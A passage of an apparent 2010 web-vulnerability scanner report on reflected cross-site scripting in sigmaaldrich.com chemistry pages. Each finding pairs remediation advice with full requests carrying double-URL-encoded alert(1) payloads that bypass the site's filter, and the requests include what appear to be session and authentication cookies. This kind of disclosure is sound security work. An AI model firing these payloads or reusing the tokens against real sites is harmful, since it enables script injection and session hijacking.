Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry9a4cf%2522%253balert%25281%2529%252f%252f139ebbace98/solvents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28927
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry9a4cf";alert(1)//139ebbace98/solvents.html","E404") ;
   </script>
...[SNIP]...

1.65. http://www.sigmaaldrich.com/chemistry/solvents.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/solvents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93497%2522%253balert%25281%2529%252f%252fbb88be0d121 was submitted in the REST URL parameter 2. This input was echoed as 93497";alert(1)//bb88be0d121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The payload above relies on exactly this: %2522 survives the web server's single decode as %22, and the application's own second decode turns it into the double quote that closes the string.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/93497%2522%253balert%25281%2529%252f%252fbb88be0d121 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:22 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/93497";alert(1)//bb88be0d121","E404") ;
   </script>
...[SNIP]...

1.66. http://www.sigmaaldrich.com/chemistry/stable-isotopes-isotec.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stable-isotopes-isotec.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353f9%2522%253balert%25281%2529%252f%252f73f0452f72 was submitted in the REST URL parameter 1. This input was echoed as 353f9";alert(1)//73f0452f72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The payload above relies on exactly this: %2522 survives the web server's single decode as %22, and the application's own second decode turns it into the double quote that closes the string.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry353f9%2522%253balert%25281%2529%252f%252f73f0452f72/stable-isotopes-isotec.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:22 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry353f9";alert(1)//73f0452f72/stable-isotopes-isotec.html","E404") ;
   </script>
...[SNIP]...

1.67. http://www.sigmaaldrich.com/chemistry/stable-isotopes-isotec.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stable-isotopes-isotec.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b19b%2522%253balert%25281%2529%252f%252fffe6be24476 was submitted in the REST URL parameter 2. This input was echoed as 8b19b";alert(1)//ffe6be24476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The payload above relies on exactly this: %2522 survives the web server's single decode as %22, and the application's own second decode turns it into the double quote that closes the string.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/8b19b%2522%253balert%25281%2529%252f%252fffe6be24476 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:24 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/8b19b";alert(1)//ffe6be24476","E404") ;
   </script>
...[SNIP]...

1.68. http://www.sigmaaldrich.com/chemistry/stockroom-reagents.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stockroom-reagents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f87be%2522%253balert%25281%2529%252f%252f2f4b0f11aec was submitted in the REST URL parameter 1. This input was echoed as f87be";alert(1)//2f4b0f11aec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The payload above relies on exactly this: %2522 survives the web server's single decode as %22, and the application's own second decode turns it into the double quote that closes the string.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryf87be%2522%253balert%25281%2529%252f%252f2f4b0f11aec/stockroom-reagents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:23 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryf87be";alert(1)//2f4b0f11aec/stockroom-reagents.html","E404") ;
   </script>
...[SNIP]...

1.69. http://www.sigmaaldrich.com/chemistry/stockroom-reagents.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stockroom-reagents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e29%2522%253balert%25281%2529%252f%252f859e850a46d was submitted in the REST URL parameter 2. This input was echoed as 22e29";alert(1)//859e850a46d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/22e29%2522%253balert%25281%2529%252f%252f859e850a46d HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
